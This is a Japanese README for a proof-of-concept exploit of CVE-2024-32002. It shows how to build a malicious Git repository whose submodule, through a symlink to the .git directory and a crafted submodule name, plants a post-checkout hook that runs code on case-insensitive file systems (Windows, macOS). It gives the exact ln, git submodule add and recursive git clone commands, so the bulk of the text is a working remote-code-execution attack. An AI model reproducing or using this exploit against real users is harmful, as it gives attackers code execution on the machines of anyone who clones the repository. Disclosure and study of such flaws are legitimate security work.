
CVE-2024-32002の概念実証エクスプロイト。大文字小文字を区別しないファイルシステム上の悪意のあるGitサブモジュールを介したリモートコード実行を示します。
CVE-2024-32002 の POC です。リモートコード実行 (RCE) を実証します。
関連するサブモジュールリポジトリについては、cve-2024-32002-poc-rce を参照してください。
.git ディレクトリにリンクする、任意の名前のシンボリックリンク。.gitmodules ファイル。このリポジトリは Linux (具体的には WSL2) で作成されました。これは重要です。悪意のあるリポジトリは、大文字と小文字を区別するファイルシステム上でのみ作成できます。
ln -s .git submodule
注:
.git フォルダを指す必要があります。ここにファイルを書き込みたいからです。git submodule add --name rce/notexists https://github.com/JakobTheDev/cve-2024-32002-submodule-rce.git Submodule/modules/rce
注:
hooks/post-checkout を格納するディレクトリの名前と一致する必要があります。cve-2024-32002-poc-rce を参照してください。.git ディレクトリ内のパス名と一致します。この脆弱性は、Windows と MacOS のみに影響します。どちらも大文字と小文字を区別しないファイルシステムを備えているためです。
git --version
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-rce.git